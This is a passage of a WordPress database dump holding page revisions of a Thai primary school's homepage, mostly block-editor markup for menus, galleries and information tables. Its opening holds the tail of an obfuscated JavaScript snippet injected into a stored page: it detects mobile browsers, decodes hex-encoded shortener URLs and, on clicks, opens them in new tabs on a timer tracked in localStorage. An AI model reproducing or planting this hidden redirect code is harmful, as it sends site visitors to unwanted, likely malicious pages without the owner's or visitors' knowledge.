g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:45:36','2024-07-27 04:45:36','',14,'http://pakhaeng.ssk.in.th/?p=104',0,'revision','',0),
(106,1,'2024-07-27 11:47:50','2024-07-27 04:47:50','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 